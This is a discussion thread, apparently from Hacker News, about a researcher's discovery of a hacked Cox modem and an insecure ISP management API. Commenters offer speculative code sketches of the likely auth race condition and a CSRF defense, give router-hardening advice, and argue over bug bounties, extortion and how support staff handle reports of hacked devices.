Global singleton shared across requests, instead of request scoped.
1. [Client 1/You] Auth/write to variable (failed).
2. [Client 2/ISP] Auth/write to variable (success).
3. Verify what the result was (success)
A race condition combined with a global singleton can easily explain such behavior.
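A minimal sketch of that failure mode (hypothetical, not Cox's actual stack): the auth result lives in a module-level global instead of being request-scoped, so interleaved requests can read each other's results.

```python
class BrokenAuth:
    last_result = False  # shared across ALL requests -- the bug

    def check(self, token):
        BrokenAuth.last_result = (token == "valid")
        return BrokenAuth.last_result

auth = BrokenAuth()

# Interleaving: the attacker's check runs and writes False, a legitimate
# client's check then overwrites the shared flag with True, and finally the
# framework (hypothetically) reads the flag to decide the attacker's request.
auth.check("bogus-token")   # attacker: writes False
auth.check("valid")         # legitimate client: overwrites with True
attacker_allowed = BrokenAuth.last_result
print(attacker_allowed)     # True -- the attacker rides the other session
```

Under real concurrent traffic the interleaving is nondeterministic, which would explain why repeating the same unauthorized request "randomly" succeeds.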
Test server from early development put into production?
This seems like a huge vulnerability. Are there any legal repercussions that happen in these situations?
I hope not. Companies would close their responsible disclosure programs as a liability issue. Everything would be less secure because of such legal exposure.
Many routers require manual firmware updates. GL.iNet routers had several RCE (Remote Code Execution) vulnerabilities within the last 6 months. I advise you to have a quick look at your own router to ensure it's not hacked, and possibly upgrade the firmware.
As a typical user, the noticeable symptoms for me were:
- internet speed noticeably slows down
- WiFi signal drops and personal devices either don't see it or struggle to connect, while the router is still connected to the internet
- the router's internal admin page (192.168.8.1) stopped responding
I imagine many users haven't updated their routers and thus may be hacked. In my case the hacker installed Pawns app from IPRoyal, which makes the router a proxy server and lets hacker and IPRoyal make money. The hacker also stole system logs containing information about who and when they use the device, whether any NAS is attached. They also had a reverse shell.
Solution:
1. Upgrade firmware to ensure these vulnerabilities are patched.
2. Then wipe the router to remove the actual malware.
3. Then disable SSH access; e.g. for GL.iNet routers that's possible within the Luci dashboard.
4. Afterwards disable remote access to the router, e.g. by turning Dynamic DNS off in GL.iNet. If remote access is needed, consider Cloudflare Tunnel or Zero Trust or similar. There is also GoodCloud, ZeroTier, Tailscale, etc. I am not too sure what they all do and which one would be suitable for protected remote access. If anyone has advice, I would appreciate a comment.
Consider avoiding GL.iNet routers. They do not follow the principle of least privilege (PoLP) - the router runs processes as the root user by default. SSH is also enabled by default (with root access), so anyone can try to bruteforce in (a 10-character password consisting of [0-9A-Z], and it might be even more predictable than that). I set mine to only allow SSH keys rather than a password to prevent that. Despite running OpenWrt they are actually running their own flavor of OpenWrt, so upgrading from OpenWrt 21.02 to 23.05 is not possible at the moment.
"As a typical user the noticeable symptoms for me were: - internet speed noticeably slows down - WiFi signal drops and..."
Could also be the neighbours and their big microwave oven :)
No payout?
It can be inferred that the author is satisfied with that aspect of the transaction by their willingness to list things that they still felt unresolved at the end.
They either were paid and think it's nobody's business or weren't and have no ideological reason for making a stink. For what it's worth, I sympathize with people who feel shafted for their work by large companies, but think it is a little silly to go looking for it.
I see arguments in favour of tr069, but it's the mechanism that BT used to reboot my modem every night at 3am. I hate ISPs.
Modem FW probably had a memory leak :)
What were those fbi redacted things? Were those backdoors?
The above response contained the physical addresses of several FBI field offices who were Cox business customers.
That's literally just FBI's customer account at Cox.
Great read, I loved following your thought process as you kept digging.
At what point did you inform Cox about your findings? It doesn't sound like you were ever given the green light to poke at their management platform. Isn't work like this legally dubious, even if it is done purely in white-hat fashion?
Cox has a vulnerability disclosure program. https://www.cox.com/aboutus/policies/cox-security-responsibl...
Not trusting the modems we're given is a damn good reason to use a VPN, as opposed to the marketing bullshit the VPN companies usually propagate.
Is there any creation of new laws, or removal of hindering laws, that would facilitate the fixing of these devastating security vulnerabilities?
One of the things I'll never understand was why the attacker was replaying my traffic? They were clearly in my network and could access everything without being detected, why replay all the HTTP requests? So odd.
I was thinking about this while reading. My guess is that the vulnerability was limited to reading incoming requests (to the modem) or something along those lines, not full control of the network. Replaying the requests is a good way to get both ends of the traffic if you can only access one. For instance, a login + password being authenticated. Just a thought!

EDIT: I'd be hard-pressed to know how one could exploit this, given TLS would encrypt the requests. Maybe they're counting on badly encrypted requests, e.g. ones using TLSv1.0?
It was so fun to read this. I am also surprised COX hot patched it within a day.
WARNING: nerd sniping. lol
Observation: The root of this problem is NOT because Cox's engineering practices lacked a comprehensive enough security review process to find and fix security vulnerabilities prior to them being discovered post deployment ("hindsight is always 20/20" as they say), but rather because there was (and still is) an Information Asymmetry between Cox and Cox's customers, i.e., in terms of complete knowledge of how Cox's devices actually work under the hood...
Although, in fairness to Cox, this Information Asymmetry -- also exists between most companies that produce tech consumer goods and most tech consumers (i.e., is it really a big deal if most other big tech companies engage in the same practices?), with the occasional exception of the truly rare, completely transparent, 100% Open Source Hardware, 100% Open Source Software company...
https://en.wikipedia.org/wiki/Information_asymmetry
Anyway, a very interesting article!
Great article, but unfortunately a determined threat actor would just go to the source and get a remote job as a Cox technician to gain access to millions of routers to add to their botnet. A real solution by the ISP would be to implement a software (or, preferably, hardware) setting that prevents remote access by default unless explicitly enabled by the customer. That approach would slow a social engineering campaign and limit the scope of a hack like this.
> there were about 700 different API calls..
That's more API endpoints than some first tier public clouds, wow. For a modem.
Somebody wanted (and sorta deserves) promo..
But also not, because the whole platform turned out to be incredibly insecure! Egregious!!!
I observed very similar behavior a few years back when transferring files between two servers under my control on different parts of a large university network.
We also initially thought we were the subject of a breach, but after the investigation we determined that the network's IDS was monitoring all traffic, and upon certain triggers, would make identical requests from external networks.
We found a way to identify all other similar IDSs across the internet and even "weaponize" this behavior. We ended up writing a paper on it: https://ian.ucsd.edu/papers/cset2023_fireye.pdf
Moral of the story - never turn on remote access on your modem.
I remember creating some webserver at work years ago, and I saw a router querying it. I warned the company admin.
Also, my wifi firmware occasionally crashes and needs to be restarted.
I don't work in cyber security or on anything sensitive, but if I was told I'm under surveillance by some government or some criminal, I would not be surprised.
It's unbelievable that Cox offers no compensation or reward for incredible work like this.
This reminded me to turn off "privacy settings" to "keep your vehicle in good condition and observe the vehicle's health" on my Volvo XC40 after the mechanics asked me to turn it on yesterday during the yearly maintenance. I don't know if they can change some settings remotely, but I prefer to be cautious
Replaying requests might be not a malicious attacker, but simply an ISP wishing to know and sell customer's interests.
Nightmare fuel. Giant tech company, giant vuln. There’s so much to say, but more than anything I’m just upset. The article and this dude are amazing. The exploit is not excusable.
One of the things I'll never understand was why the attacker was replaying my traffic? They were clearly in my network and could access everything without being detected, why replay all the HTTP requests? So odd.
Did you determine if POSTs were replayed? As in, logging into accounts and sending payment info and account info?
> Authenticate your access patterns.
What does this mean?
Some CPE exposes an API on the LAN side, and some of these APIs aren’t protected against CSRF. I wonder whether the modem in question is vulnerable.
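The standard defense is a per-session token that third-party pages can't read. A minimal sketch of the kind of check such a LAN API would need (endpoint and handler names are hypothetical, not any real firmware's API):

```python
import secrets

# The browser attaches ambient credentials (cookies, session) automatically,
# so any page the user visits can POST to http://192.168.1.1/... unless the
# request must also carry a token that cross-origin pages cannot obtain.
SESSION_TOKEN = secrets.token_hex(16)

def handle_reboot(form):
    # Without this check, a hidden auto-submitting <form> on any website
    # could reboot (or reconfigure) the modem from inside the LAN.
    if form.get("csrf_token") != SESSION_TOKEN:
        return 403
    return 200  # would trigger the reboot here

print(handle_reboot({"csrf_token": "guessed"}))      # 403
print(handle_reboot({"csrf_token": SESSION_TOKEN}))  # 200
```

Plenty of CPE web UIs historically skipped this, on the assumption that "LAN-side" means "trusted" - which it doesn't, since the user's browser sits on the LAN.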
Wow! I can only imagine the high a security researcher would feel while performing this research and finding one open door after another!
I wonder if it’s a mix of exhilaration and being terrified!
Another reason to not use ISP provided hardware. I have never had issues using my own OpenBSD box as a router.
Somehow, someone was intercepting and replaying the web traffic from likely every single device on my home network.
Normally I'd laugh and assume device compromise but...
The largest ISP in Australia (Telstra) got caught doing exactly this over a decade ago. People got extra paranoid when they noticed the originating IP was from Rackspace as opposed to within Telstra. Turned out to be a filter vendor scraping with dubious acceptance from customers. The ToS was quietly and promptly updated.
I love how well he explains it, even to someone like me who knows p much nothing about cybersecurity.
My bet on the replays was that the attacker misconfigured their payload or something and it was meant to replay command and control requests to obfuscate where the C2 server was
Agreed, let's hope they don't bloody sue him into the ground for "hacking".
It's stuff like this that companies should REWARD people for finding.
I assumed they offered a bounty for bug disclosure? You mean to tell me that an internet provider with 11 billion in revenue can't pay someone that found a bug impacting all their clients?
Frankly he could have just sold the vulnerability to the highest bidder
Why? Ethics aside, is everything money?
Ethics aside, why not? That's why we have ethics.
Because even if I remove ethics, I can't find a reason for doing something like that.
For me, doing the right thing is beyond all these things, and I don't care about money beyond buying the necessities I need.
That...is ethics, no?
Ethics and character, yes, and an attitude towards life that doesn't regard money as the deeper meaning of everything.
Ethics aside, what is characterful about saying no to money? Should I say no to my salary for character reasons?
There's a difference between doing your job and earning money as a result vs. finding keys to someone's house and selling said keys to the highest bidder.
Yes: ethics.
Some of us can get there without the organized principles, simply with empathy. It's even deeply selfish in its own way.
Ethics is our answer for those that can't.
Money often starts out as necessity or one of its close cousins. If I were 1) 8k miles away from my target, 2) in a region with more internet access than employment prospects and 3) needed to eat, I can see a path to profitable disclosure.
This can be a luxury. After a year or 3 of kids in and out of hunger, what's right can get reframed.
Getting beyond that is the thing.
Vendors who pay bounties often restrict public disclosure, and the professional value obtained from being able to talk about the research you do may be worth significantly more than the payout
Professional value that doesn't translate into money, do you mean? How do you categorise that?
I take the "professional value" to mean essentially putting it on your resume, gaining publicity by blogging about it, getting conference organizers to let you give a talk about it, etc., all of which may ultimately increase the money you can earn doing computer security.
Ethics aside, there are many thing that move people, and it's not always money. For instance, selling the vulnerability means the author wouldn't have been able to tell their story.
because money grants wishes, and having more money means you get more of your wishes granted.
That doesn't make me interested. I don't get all excited about the things money can buy.
Edit: As I noted elsewhere, necessities are something else.
I would love to have the money (42k EUR) to buy Scewo, which is an advanced self balancing stair climbing wheelchair. Sadly enough, I doubt I will ever be able to.
May I suggest a decade of red state hunger-level poverty? My kids and I did it. Three years out of it, I get excited paying utilities on time.
Wait till you hear about buying governments.
So this security researcher can keep doing his research without worrying about paying bills. The company gets a cheap security audit, the researcher gets money, everybody wins.
This attitude is why "independent security researchers" offering to present unsolicited findings to companies in exchange for payment feels exactly like extortion.
At the same time, Cox is a commercial entity that makes money by providing services. Cyberattacks make them lose money, so it's only fair for them to financially award people that responsibly inform them of vulnerabilities instead of easily and anonymously selling those.
We're not talking about a grandma losing her wallet with 50 bucks in it and not giving money to the guy that found it and gave it back to her.
Yes, Cox has that choice. But, what you're describing is the definition of extortion. The fact that it's easy for people to get away with it does not make it ethical.
It's not the definition of extortion. If I walk past a business and notice the locks on their windows are rusted and I happen to be a lock guy and say hey, I noticed your locks are fucked, I'd be happy to consult for you and show you how and why they are broken, that's just doing business. Extortion is telling them, hey, your locks are fucked and I'm telling everyone unless you pay me. It requires a threat.
You just manufactured a completely different scenario.
The comment I responded to was this:
That comment includes the threat ("instead of easily and anonymously selling those").
So, yes. That is the definition of extortion.
I think preventing people from having that incentive vs an actual threat are not the same, which is how I read the hypothetical.
The following two sentences read the same to me:
"To remove my incentive to harm you, you should pay me".
"To remove my incentive to share information with others who may harm you, you should pay me".
And, the threat is pretty clear IMO.
Do you not lock your doors because you feel you shouldn't have to worry about people stealing your stuff because it's morally wrong to steal or do you do it to mitigate risk? Suggesting someone should mitigate potential risk is all we are talking about.
You're making a different argument now.
https://news.ycombinator.com/item?id=40577683
Great response, entirely agree.
At the end of the day your enemy has no ethics, and we share the public internet with enemies. If paying to find security flaws means it's more likely people will find your flaws rather than sell them to someone that will use them for nefarious means then it is the better bet.
Making an argument for what's practical and what's ethical are two different things. My comment was about the latter. Yours appears to be about the former.
Ransomware victims have sometimes found it practical to pay the ransom. They're still victims of extortion.
While beg-bounty people can be annoying, you have to remember that people aren't obligated to sit down and find free bugs for any company (especially not a big one) - why would I sit down and look at some code for free for some giant corp when I could go to the beach instead?
No, they aren't obligated. So, if there's no bug bounty program in place, then they should either go to the beach or be willing to find bugs for the public good.
The idea that the company owes them anything for their unsolicited work is misguided. And, if they present the bugs for money under the implicit threat of selling the information to people who would harm the company, then it's extortion.
I would agree with everything you said, If we ignore the fact that the company has billions of dollars in revenue and paying a bug bounty is a drop in the ocean for them.
Do you think it's reasonable to say the the ethics of what you call "extortion" should depend with how big the company is? I'm obviously not advocating for making a small company pay more than they can manage
That framing is strange to me. If they want to offer a bug bounty, then they can. But, it's their choice. Maybe they'd instead rather engage a security firm of their own selection.
But, whatever the case, to say "they should pay the money because they can afford to" isn't right to me. I don't believe the definition of extortion changes based on how big the target is or whether it can afford to pay.
In fact, the line of thinking in some of the comments here is so far off from what seems obviously ethical to me that I've had to re-read a few times to ensure that I'm not missing something.
1. Companies are amoral entities, and given the opportunity have few qualms about screwing people over if they can profit from it. Why do you expect people to behave ethically towards entities that most likely won't treat them ethically?
2. If said person doesn't present the bug to the company, but just goes straight to selling it to the highest bidder it's not extortion. If the company does not provide the right incentives (via e.g. bug bounties), isn't it their own fault if they get pwnd? They clearly don't value security.
You seem to be saying it's essentially "justified extortion" and not immoral because you've adjudicated them guilty. We disagree.
Not to mention them getting "pwnd" creates a lot of collateral damage in the form of innocent customers.
They do not:
https://www.cox.com/aboutus/policies/cox-security-responsibl...
Mh, we have a similar thing on our website at work, but people who found serious issues still got compensated.
One big reason to put this out there: Otherwise you get so many drive-by disclosures. Throw ZAP at the domain, copy all of the low and informational topics into a mail at security@domain and ask for a hundred bucks. Just sifting through that nonsense eventually takes up significant time. If you can just answer that with a link to this statement it becomes easier.
It makes me a bit sad that this might scare off some motivated, well natured newbs poking at our API, but the spam drowned them out.
Don’t frame a company not parting ways with money that they could hypothetically part ways with as being unusually egregious. That’s never how it works. Not every conversation needs overstated outrage.
Yeah let’s hope that they don’t prosecute him under the CFAA. He saved the FBI and untold others. He’s a hero.
They have a pretty good looking responsible disclosure program which I’m assuming he checked first - it’d be surprising for someone who works in the field not to have that same concern:
https://www.cox.com/aboutus/policies/cox-security-responsibl...
It's hard to imagine, but I wish they would have taken advantage of him walking in with the compromised device in the first place.
I once stumbled upon a really bad vulnerability in a traditional telco provider, and the amount of work it took to get them to pay attention when only having the front door available was staggering. Took dedicated attempts over about a week to get in touch with the right people - their support org was completely ineffective at escalating the issue.
Cox's support organization was presented with a compromised device being handed to them by an infosec professional, and they couldn't handle it effectively at all.
He probably should have gone the responsible disclosure route with the modem too. Do you really expect a minimum wage front desk worker to be able to determine what’s a potential major security flaw, and what’s a random idiot who thinks his modem is broken because “modern warfare is slow”?
I would expect a front-desk worker to be trained to escalate issues within the org, and supported in doing so.
Have you ever worked as a front-line support agent? I'm guessing not. I have, many years ago, and for an ISP too. If I'd bought an Amazon share back then for every time a customer called support because they were "hacked", I'd not be posting here during a boring meeting because I'd own my own private island.
The two best conversations I can recall were when we changed a customer's email address about a half dozen times over a year because "hackers were getting in and sending them emails" (internal customer note: stop signing up for porn sites), and a customer's computer could barely browse the web because they were running about 5 software firewalls because they were "under surveillance by the NSA" (internal customer note: schizophrenia).
The expected value of processing requests like this any way other than patting the reporter on their head and assuring them the company will research it, then sending them along their way with a new device while chucking the old one in the "reflash" pile isn't just zero, it's sharply negative.
The author's mistake was not posting somewhere like NANOG or Full-Disclosure with a detailed write-up. The right circles would've seen it, the detailed write-up would've revealed that the author wasn't an idiot or paranoid, and the popped device might've been researched.
This is an organizational equivalent of a code smell. Something is off when support people aren't writing up the anomalies and escalating them.
Some of the most serious security issues I've ever had to deal with started with either a sales rep getting a call or a very humble ticket with a level one escalating it up. Problem is for every serious security issue that gets written up, forty-two or so end up getting ignored because the support agent is evaluated on tickets per hour or some other metric that incentivizes ignoring anything that can't be closed by sending a knowledge base article.
"Code smell" as a programming term is often a red herring that causes conflicts within development teams (I've seen this happen too many times), because anyone can call anything they don't like about a coworkers code as a "code smell". Your comment is a "code smell". See how easy that was?
And "code smell" doesn't apply in a similar or metaphorical way to cable modem support personnel. Those people aren't supposed to know how to escalate a case of a customer bringing in a suspected hacked modem. If they did that for every idiot customer that brought in a "suspicious" modem, the company's tech support staff wouldn't be able to get anything done. 99.999999999999% of the cases would not in fact be a hacked modem, so there really shouldn't be any pathway to escalate this as a serious issue.
I’ve been in this industry for 15 years and I’ve never had to deal with the code smell situation, in that I don’t use that term and I’ve never interacted with anyone at work who uses that term.
I think after reading this I’ll continue that habit. Putting the phrase “code smell” in a review is like using the dark side of the force: you’re just being an ass
What is described in the article is a fantastic hack. Given my organization's structure and skills, you'd need to send it straight past three layers of support and several layers of engineering before you find someone who'd be able to assemble a team to analyze the claims. We'd spend four figures an hour just to confirm the problem actually exists - then we'd all go "oh shit, how do we get in touch with the FBI, because this is miles above our paygrade."
An average cable internet user walks into a retail ISP location, sets a cable modem on the counter, and says "this is hacked". What is the probability you'd assign to them being correct? How much of your budget are you willing to spend to prove/disprove their theory? How often are you willing to spend that - remembering Cox has 3.5 million subscribers.
Friction is good. Hell, it's underrated! Introduce it to filter out fantastic claims: the stupid and paranoid are ignored quickly, leaving the ones that make it through as more likely to be real.
You can tell exactly from the responses in this thread who has dealt with the general public in a support role, and who hasn't.
I haven't even dealt with the general public in a support role but I have enough examples just in my, not very large, social circle.
The aunt who is convinced she has a stalker who is hacking all her devices and moving icons around and renaming files to mess with her (watching her use the computer, she has trouble with clicking/double-clicking and brushing up against the mouse/trackpad. call her out on it, she says she didn't do it)
The coworker who was a college football player, who now has TBI-induced paranoia. He was changing his passwords about 3 times a day. Last thing I heard about him before he got cut out of my social circle was he got in a car accident because he was changing his password while he was driving.
Meanwhile I know zero people who have found any real vulnerabilities.
I have escalated customer security issues while working as a support agent. I have also found and been paid what could be considered a bounty (in the form of a bet made by the lead dev to another person) while working support.
Admittedly, this is anecdotal, and it was a small company, and my skillset was being very underutilized at the time. However, I don't think it's hard to imagine a me that would have been closed minded enough to normalize my experiences and expect it of others. In fact, I'd say I still fight with it regardless of having seen it.
If the man wanted the router back, they should'a given the router back.
Where's the lie? We all are.
We really need to work on this definition of "expect". It's expected of them to have such training, but we know that in practice that is not what happens. So we "expect" them to be trained, but what we "expect" will happen in practice is very different.
Every third person who comes in claims their router was hacked; that's the problem. We know that Sam is good at what he does and won't be wrong about this, but Cox can't rely on everyone being that good, nor on their very poorly paid front-desk worker having the ability to tell whether someone is an idiot or an expert.
Source: was a volunteer front-desk person at a museum. Spent a lot of my life dealing with people. They were sure of incorrect things all the time and could not be relied on to know.
In retrospect, Sam should definitely have hit the responsible disclosure page (if such a thing even existed in 2021) but I don't fault anyone for the choices they made here.
I think he was probably keen to get back on the Internet to be fair.
He wasn’t off the internet. He just determined his modem was hacked. Given it had been hacked for who knows how long, what’s one more day? They responded to his API submission in 6 hours.
I can't really blame them. The number of customers able to demonstrate that a device has actually been hacked is nearly zero. But do you know how many naive users out there will call/visit because they think they've been hacked? It's unfortunately larger than the former. And that costs the business money, when in 99.9% of those cases the user is wrong. They have not been hacked. I say this as someone who supported home users in the 2000s. Home users who often thought they'd been "hacked".
How many of those show up in person though?
Just the craziest, wrongest ones
+1 to this. Dealt with the same in consumer PC repair.
This was my experience too.
Some people truly believe the computer is hacked every time there is behaviour they didn't expect. Only the craziest, least capable ones show up to scream at you like you caused the whole thing.
yeah the false positive problem is huge here. For every legitimate security professional there are probably 10-100 schizos who believe they are “hacked”
I was mentioned in the media once for an unrelated internet protocol vulnerability and I had people contacting me about their "hacked" internet connections.
For a major cable ISP, I can't imagine how many customers walk in to replace their "hacked" boxes on a daily basis.
That is the problem. He should have contacted them like he did the second time. When he went into their shop, it all depended on that particular employee, and you can't blame that person for not recognizing the issue.
I work for a support org for a traditional telco. We have "contacts" but they're effectively middlemen.
If you dropped this in my lap, and I'm pretty savvy for a layman, I wouldn't know how to get past my single channel. I think it would require convincing the gatekeeper.
I used to run a small telco noc and if any of my guys sat on something like this rather than reporting it to me I would have turfed them.
Especially because both of the ISPs we supported insisted on using a lot of dodgy CPE.
They probably get someone coming in asking to change it because someone in LoL said they just hacked their computer.
I’ve often wished I could show an “I know what I’m doing” badge to support to guarantee escalation.
“I’m a three star infosec General, if I’m contacting you it’s not to waste your time.”
I have a cloned key from a spare modem that I use with my router (Unifi) to allow it to connect directly to the ONT, minimizing devices in my rack.
I’ve found that this usually confuses first line support enough that they’ll listen to me if I need them to do some specific action.
To be clear, I’m not stealing internet access or anything of the sort. I didn’t want a useless modem / AP that I’d end up bridging anyway, so I extracted a key from another one, and my router uses it to auth with my ISP.
It quickly becomes the Service Animal problem. When no one can or is allowed to verify your infosec credentials, everyone becomes a three star infosec General with a simple purchase from Amazon/Alibaba.
They were presented with some random person who wanted to get a new modem on their rental but also keep the old one, for free. They had no way of knowing whether he was an actual security professional.
I've seen this across most companies I've tried reporting stuff to, two examples.
Sniffies (NSFW - gay hookup site) was at one point blasting their internal models out over a websocket; this included IP, private photos, salt + password [not plaintext], reports (who reported you, their message, etc), internal data such as your ISP, and push notification certs for sending browser notifications. First-line support dismissed it. Emails to higher-ups got it taken care of in < 24 hours.
Funimation back in ~2019(?) was using Demandware for their shop and left its API basically wide open, allowing you to query orders (with no info required), getting the last 4 of the CC, address, email, etc. for every order. Again, frontline support dismissed it. This one took messaging the CTO over LinkedIn to get it resolved in under a week (Thanksgiving week, at that).
Sounds to me like their support org was reasonably effective at their real job, which is keeping the crazies away from the engineers.
It's even harder for me to imagine them saying "Oh, gee, thanks for discovering that! Please walk right into the office, our firmware developer Greg is hard at work on the next-gen router but you can interrupt him."
it's good but the constant use of "super" was a little off-putting, "super curious", "super interesting", "super interested", etc.
There were 4 occurrences of the word "super" in an article of more than four thousand words. There's no need for the "etc.": you quoted all the occurrences, since "super curious" was used twice.
I guess that reader is super sensitive.
IMHO, your comment is super nitpicky.
Super off-putting, you mean.
Totally agree, an easy read and a great reaction by Cox. I also like that the discovery and the bug itself were not communicated in a negative or condescending way, which is sometimes the case.
Completely agree. These kinds of articles are always an inspiration. It's nowhere near as wholesome as the original post, but I've tried to write in a similar style before. Shameless self-plug: https://blog.aydindogm.us/posts/superbox-hacks-v1/
> I'd love to read a follow up on what the bug was that intermittently permitted unauthorised access to the APIs
I would, too. Not sure we will ever learn. Maybe a load balancer config that inadvertently included "test" backends which didn't check authorization?
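To make that guess concrete, here's a purely speculative sketch (in Python, with entirely hypothetical names; nothing is known about Cox's actual setup) of how a backend pool that accidentally includes an auth-skipping "test" backend would produce exactly this kind of intermittent unauthorized access:

```python
import random

def prod_backend(request):
    # Production backend: enforces authorization.
    if not request.get("authorized"):
        return 403
    return 200

def test_backend(request):
    # Test backend: authorization check disabled for convenience.
    return 200

# Misconfigured pool: a test backend slipped in alongside production ones.
POOL = [prod_backend, prod_backend, test_backend]

def load_balancer(request):
    # Random (round-robin-like) routing: roughly 1 in 3 unauthorized
    # requests land on the test backend and succeed anyway.
    return random.choice(POOL)(request)

# The same unauthorized request sometimes gets 403, sometimes 200.
results = {load_balancer({"authorized": False}) for _ in range(1000)}
```

That would explain why superficial testing misses it: any single probe has a decent chance of hitting a correctly configured backend, so the bug only shows up as an occasional success.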